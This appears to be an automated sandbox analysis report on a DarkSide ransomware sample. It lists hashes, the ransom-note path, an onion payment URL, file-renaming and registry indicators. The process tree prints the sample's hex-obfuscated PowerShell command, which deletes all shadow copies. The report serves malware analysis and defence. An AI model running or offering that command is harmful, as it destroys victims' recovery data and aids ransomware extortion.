Analysis
-
max time kernel
51s -
max time network
95s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
26-07-2021 12:57
Static task
static1
Behavioral task
behavioral1
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Resource
win10v20210408
General
-
Target
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
-
Size
59KB
-
MD5
0ed51a595631e9b4d60896ab5573332f
-
SHA1
7ae73b5e1622049380c9b615ce3b7f636665584b
-
SHA256
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
-
SHA512
9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
Malware Config
Extracted
C:\\README.341d6443.TXT
darkside
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exedescription ioc process File renamed C:\Users\Admin\Pictures\InitializeStep.tif => C:\Users\Admin\Pictures\InitializeStep.tif.341d6443 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe File opened for modification C:\Users\Admin\Pictures\InitializeStep.tif.341d6443 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe File opened for modification C:\Users\Admin\Pictures\RemoveStart.tiff 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe File renamed C:\Users\Admin\Pictures\RemoveStart.tiff => C:\Users\Admin\Pictures\RemoveStart.tiff.341d6443 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe File opened for modification C:\Users\Admin\Pictures\RemoveStart.tiff.341d6443 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe -
Modifies Control Panel 1 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe -
Modifies registry class 5 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exepid process 1776 powershell.exe 1776 powershell.exe 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeSecurityPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeTakeOwnershipPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeLoadDriverPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeSystemProfilePrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeSystemtimePrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeProfSingleProcessPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeIncBasePriorityPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeCreatePagefilePrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeBackupPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeRestorePrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeShutdownPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeDebugPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeSystemEnvironmentPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeRemoteShutdownPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeUndockPrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeManageVolumePrivilege 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: 33 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: 34 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: 35 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeBackupPrivilege 1492 vssvc.exe Token: SeRestorePrivilege 1492 vssvc.exe Token: SeAuditPrivilege 1492 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exedescription pid process target process PID 1996 wrote to memory of 1776 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe powershell.exe PID 1996 wrote to memory of 1776 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe powershell.exe PID 1996 wrote to memory of 1776 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe powershell.exe PID 1996 wrote to memory of 1776 1996 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe"C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
ded84bbbd45365d6b61e3605dd94e791
SHA1e08e94759114e938cdb339e5e4859ca625f1c96e
SHA2566cb70d130f217bcca610592cfcf0219bd0ade65a89779701b6fcafbd8fcdfecf
SHA512357f0db459415ae2e9f2beb088819e9b8bb65468dea7ca5c3fe9a4380899d9289b5b52ce68d7e09b758278a3ba0440847955f7803c33a788a2a41a137585d332
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
9d35a340286ab24713cf65a224b0956f
SHA153828bee0b99a5273f13ed05cd620ebf765dd56c
SHA25608bef31aa537318a22fd6c8097c2495bf482573b8151535ca960c0124fe03414
SHA512d4aa15cc5be1e491edd0c6c152d4bd820984ea86722e8f485c8202000a33c0974749aa7f47535ef530edf2fd8a51d9d1232fc5ca5a54ae940bbf2dd0a56b4e5f
-
memory/1776-67-0x000000001ABC4000-0x000000001ABC6000-memory.dmpFilesize
8KB
-
memory/1776-63-0x0000000002320000-0x0000000002321000-memory.dmpFilesize
4KB
-
memory/1776-64-0x000000001AC40000-0x000000001AC41000-memory.dmpFilesize
4KB
-
memory/1776-65-0x0000000001EB0000-0x0000000001EB1000-memory.dmpFilesize
4KB
-
memory/1776-66-0x000000001ABC0000-0x000000001ABC2000-memory.dmpFilesize
8KB
-
memory/1776-68-0x00000000023E0000-0x00000000023E1000-memory.dmpFilesize
4KB
-
memory/1776-69-0x000000001C340000-0x000000001C341000-memory.dmpFilesize
4KB
-
memory/1776-70-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/1776-62-0x000007FEFB741000-0x000007FEFB743000-memory.dmpFilesize
8KB
-
memory/1776-61-0x0000000000000000-mapping.dmp
-
memory/1996-60-0x0000000074FB1000-0x0000000074FB3000-memory.dmpFilesize
8KB